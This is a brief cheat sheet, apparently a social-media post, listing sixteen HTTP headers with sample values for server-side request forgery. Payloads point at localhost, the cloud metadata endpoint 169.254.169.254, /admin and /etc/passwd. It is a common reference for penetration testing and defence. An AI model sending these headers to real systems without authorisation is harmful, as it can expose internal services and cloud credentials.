LI - 16 HTTP Headers That Can Cause SSRF
LI - 16 HTTP Headers That Can Cause SSRF
Host
Example:
Host: 127.0.0.1
X-Forwarded-For
Example:
X-Forwarded-For: 169.254.169.254
X-Forwarded-Host
Example:
X-Forwarded-Host: localhost
X-Original-URL
Example:
X-Original-URL: /admin
X-Rewrite-URL
Example:
X-Rewrite-URL: /etc/passwd
X-Real-IP
Example:
X-Real-IP: 127.0.0.1
Location
Example:
Location:
http://169.254.169.254/latest/meta-da
ta
Content-Location
Example:
Content-Location:
http://127.0.0.1/private
Origin
Example:
Origin: http://169.254.169.254
Forwarded
Example:
Forwarded: for=127.0.0.1
Destination
Example:
Destination: http://localhost/files
SOAPAction
Example:
SOAPAction:
http://127.0.0.1/internal-api
Link
Example:
Link: <http://127.0.0.1>;
rel="preload"
Via
Example:
Via: 1.1 internal.proxy
X-Forwarded-Proto
Example:
X-Forwarded-Proto: http
X-Accel-Redirect
Example:
X-Accel-Redirect: /internal/resource